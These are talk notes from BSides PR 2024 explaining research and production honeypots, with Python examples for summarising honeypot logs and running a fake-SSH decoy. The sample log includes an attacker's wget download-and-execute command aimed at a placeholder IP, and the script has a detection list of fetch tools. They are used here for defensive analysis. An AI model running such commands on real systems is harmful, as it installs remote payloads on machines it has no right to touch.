BSIDES PR 2024

Hi there! Here are some notes and information on my BSIDES PR 2024 presentation.

Honeypot definition

A honeypot is a cybersecurity defense resource whose value lies in being probed, attacked, or compromised.

Put differently, a honeypot is a decoy: a system, service, or piece of data that has no production purpose and exists only to lure attackers. Because nobody legitimate should ever touch it, any interaction with it is suspicious by definition.

Common characteristics:

  • Deceptive: it looks like a real asset (a service, a host, a credential), so the attacker treats it as one.

  • Discoverable: an attacker can find it by the same means they would find the real asset (scanning, browsing a share, reading a config file).

  • Interactive: it responds enough to keep the attacker engaged, from a single banner up to a full shell.

  • Monitored: every interaction is recorded and, where the honeypot is used defensively, alerted on.

Honeypot types

Research

  • Research honeypots typically manifest as simulated systems or services and are primarily used to observe attacker behavior or track the spread of malware. They generate extensive log data. Their interaction level is a separate design choice rather than a consequence of the research purpose: a low-interaction research honeypot emulates just enough of a service to record scans and login attempts, while a high-interaction one exposes a real, fully instrumented system so that post-compromise behavior can be observed in depth, at the cost of more risk and more effort to contain.

| Talking point | Description |
|---|---|
| Observation of attacker behavior | Research honeypots are used to observe how attackers behave, providing input for threat analysis. |
| Tracking self-replicating malware | They track the spread and behavior of self-replicating malware across networks. |
| Used by threat researchers | They are primarily deployed by threat researchers to gather intelligence on cyber threats. |
| Public accessibility | They are typically exposed to the internet, which lets them collect data from a wide range of sources. |
| Generation of log data | They produce large volumes of log data, the raw material for analysis and research. |
| Manifestation as systems or services | They appear as simulated systems or services that mimic real-world targets in order to attract attackers. |
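The talking points above say that a research honeypot's output is log data about attacker behavior. As an added example (not part of the original talk material), the script below turns a small event log into the kind of observations a researcher wants: login attempts per source, the credentials tried most often, the commands each source ran, and which sources showed download-and-execute staging, the typical first step of self-propagating malware. The log lines are constructed for this example in a generic JSON-lines shape (field names `event`, `src_ip`, `username`, `password`, `input` are assumptions, not a specific honeypot's format), the IP addresses are documentation ranges, and the staging check is a deliberately simple heuristic.

```python
"""Summarise a research honeypot's event log into attacker-behaviour observations.

Added example; the log format and sample lines are constructed for illustration.
"""
import json
from collections import Counter, defaultdict

# Constructed sample log (JSON lines). Addresses are RFC 5737 documentation ranges.
SAMPLE_LOG = """\
{"ts":"2024-05-18T02:14:07Z","src_ip":"203.0.113.10","event":"login.failed","username":"root","password":"123456"}
{"ts":"2024-05-18T02:14:09Z","src_ip":"203.0.113.10","event":"login.failed","username":"root","password":"password"}
{"ts":"2024-05-18T02:14:11Z","src_ip":"203.0.113.10","event":"login.success","username":"root","password":"admin"}
{"ts":"2024-05-18T02:14:12Z","src_ip":"203.0.113.10","event":"command.input","input":"cd /tmp; wget http://198.51.100.7/x.sh; chmod +x x.sh; ./x.sh"}
{"ts":"2024-05-18T02:14:13Z","src_ip":"203.0.113.10","event":"session.closed"}
{"ts":"2024-05-18T02:20:40Z","src_ip":"198.51.100.23","event":"login.failed","username":"admin","password":"admin"}
{"ts":"2024-05-18T02:20:42Z","src_ip":"198.51.100.23","event":"login.failed","username":"root","password":"123456"}
{"ts":"2024-05-18T02:20:43Z","src_ip":"198.51.100.23","event":"session.closed"}
{"ts":"2024-05-18T03:01:02Z","src_ip":"203.0.113.77","event":"login.success","username":"pi","password":"raspberry"}
{"ts":"2024-05-18T03:01:05Z","src_ip":"203.0.113.77","event":"command.input","input":"uname -a"}
{"ts":"2024-05-18T03:01:09Z","src_ip":"203.0.113.77","event":"command.input","input":"cat /proc/cpuinfo"}
{"ts":"2024-05-18T03:01:20Z","src_ip":"203.0.113.77","event":"session.closed"}
"""

# Tools an attacker commonly uses to pull a payload onto the box (heuristic list).
FETCH_TOOLS = ("wget ", "curl ", "tftp ")


def parse_events(text):
    """Parse JSON lines into dicts, skipping blank or truncated lines.

    A sensor that is still writing when the log is copied often ends mid-line,
    so one bad line must not abort the whole analysis.
    """
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def looks_like_staging(command):
    """Heuristic: one command line that fetches a file and makes it executable or runs it.

    This is the download-and-execute pattern seen when a bot stages its payload;
    it is an illustrative rule, not a complete classifier.
    """
    fetch = any(tool in command for tool in FETCH_TOOLS)
    execute = "chmod" in command or "./" in command
    return fetch and execute


def summarize(events):
    """Aggregate raw events into the observations a researcher looks for."""
    login_attempts = Counter()          # how hard each source tried to get in
    credentials = Counter()             # which (user, password) pairs are being sprayed
    commands_by_ip = defaultdict(list)  # what each source did once inside
    for ev in events:
        kind = ev.get("event", "")
        if kind.startswith("login."):
            login_attempts[ev["src_ip"]] += 1
            credentials[(ev["username"], ev["password"])] += 1
        elif kind == "command.input":
            commands_by_ip[ev["src_ip"]].append(ev["input"])
    staging_sources = sorted(
        ip for ip, cmds in commands_by_ip.items()
        if any(looks_like_staging(c) for c in cmds)
    )
    return {
        "login_attempts_by_ip": dict(login_attempts),
        "top_credentials": credentials.most_common(3),
        "commands_by_ip": dict(commands_by_ip),
        "staging_sources": staging_sources,
    }


if __name__ == "__main__":
    summary = summarize(parse_events(SAMPLE_LOG))
    print(json.dumps(summary, indent=2, default=str))
```

On the sample, the summary separates a source that sprayed credentials and then staged a payload (203.0.113.10) from one that only guessed passwords and left, and from one that logged in and merely fingerprinted the host. That distinction, not the raw volume of log lines, is what the research data is for.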

Production

  • Production honeypots, on the other hand, are deployed inside a network as a form of intrusion detection: they sit alongside real assets, raise an alert as soon as anything touches them, and may trigger a response when an attacker interacts with them. This does not make them high-interaction honeypots. Interaction level describes how much of a real system the honeypot offers to the attacker, not how closely the defender watches it, and most production honeypots are deliberately low-interaction (a listening port, a planted token) because a decoy inside a production network must be cheap to run and must not become a foothold if it is compromised.

| Talking point | Description |
|---|---|
| Intrusion detection | Production honeypots act as a detection sensor, revealing the presence of an attacker who is already inside the network. |
| Deployment by blue teamers | Blue teamers deploy them for defensive purposes, to improve the security posture of their own networks. |
| Internal visibility | They are visible inside the network, so they detect lateral movement and other internal threats that perimeter controls miss. |
| Alert generation | They generate an alert on any interaction, enabling a timely response. |
| Manifestation as services or tokens | They appear as services or as tokens (for example planted credentials or documents) that mimic legitimate assets. |
| Low false positive rate | No legitimate user or process has a reason to touch them, so nearly every interaction is a true positive. The main exceptions to watch for are authorized scanners and inventory tools, which should be excluded explicitly. |
| Concealment from attackers | They are designed to be hard for an attacker to distinguish from genuine assets in the network. |
| Triggered response | When an attacker finds and interacts with a production honeypot, the alert starts an investigation and any pre-agreed response. |
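The "Common characteristics" list and the production talking points above describe a decoy that looks like a service, can be found on the network, responds enough to be believed, and turns every connection into an alert. The script below is an added example of exactly that, not code from the talk: a minimal low-interaction production honeypot that listens on a TCP port, presents a deceptive SSH-style banner, records the first bytes the client sends, and emits one structured alert per connection. The banner string, the `honeypot-ssh` sensor name and the alert field names are assumptions chosen for the example; in a real deployment the alert would be shipped to a SIEM instead of printed.

```python
"""Minimal low-interaction production honeypot (added example).

Deceptive: a fake SSH banner. Discoverable: a real listening port.
Interactive: it answers and reads what the client sends. Monitored: every
connection becomes an alert, because no legitimate client should ever connect.
"""
import json
import socket
import socketserver
import threading
from datetime import datetime, timezone

# Deceptive banner. The version string is an arbitrary example for this demo.
FAKE_BANNER = b"SSH-2.0-OpenSSH_8.9p1\r\n"


def build_alert(client_address, dst_port, data):
    """Turn one connection into an alert record. Field names are this example's choice."""
    return {
        "ts": datetime.now(timezone.utc).isoformat(timespec="seconds"),
        "sensor": "honeypot-ssh",      # hypothetical sensor name
        "severity": "high",            # any touch is suspect: the decoy has no legitimate users
        "src_ip": client_address[0],
        "src_port": client_address[1],
        "dst_port": dst_port,
        "bytes_received": len(data),
        "first_bytes": data[:64].decode("utf-8", "replace"),
    }


class HoneypotHandler(socketserver.BaseRequestHandler):
    def handle(self):
        self.request.settimeout(2.0)               # do not let a silent client tie up the sensor
        self.request.sendall(FAKE_BANNER)          # interactive enough to look like sshd
        try:
            data = self.request.recv(1024)         # capture the client's first message only
        except (socket.timeout, ConnectionError):
            data = b""
        alert = build_alert(self.client_address, self.server.server_address[1], data)
        self.server.alerts.append(alert)           # monitored: keep the record
        print(json.dumps(alert))                   # stand-in for shipping to the SIEM
        # handle() returns here; socketserver then closes the connection, so the
        # attacker never gets past the banner (low interaction by design).


class HoneypotServer(socketserver.ThreadingTCPServer):
    allow_reuse_address = True
    daemon_threads = True

    def __init__(self, server_address):
        super().__init__(server_address, HoneypotHandler)
        self.alerts = []


def start_honeypot(host="127.0.0.1", port=0):
    """Start the listener in a background thread; port 0 lets the OS pick a free port."""
    server = HoneypotServer((host, port))
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def probe(port, payload, host="127.0.0.1"):
    """Play the attacker's client: read the banner, send a payload, wait for the close."""
    with socket.create_connection((host, port), timeout=5) as s:
        banner = s.recv(1024)
        s.sendall(payload)
        while s.recv(1024):                         # drain until the honeypot hangs up
            pass
    return banner


if __name__ == "__main__":
    srv = start_honeypot()
    try:
        print(probe(srv.server_address[1], b"SSH-2.0-libssh_0.9.6\r\n"))
    finally:
        srv.shutdown()
        srv.server_close()
```

Two design points carry over to real deployments. The sensor closes the connection after the first message, so a compromised decoy offers nothing to pivot from, and the alert is produced for the connection itself rather than for any particular payload, which is where the low false positive rate comes from: the detection logic is "someone talked to a port nobody should talk to", not a signature.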
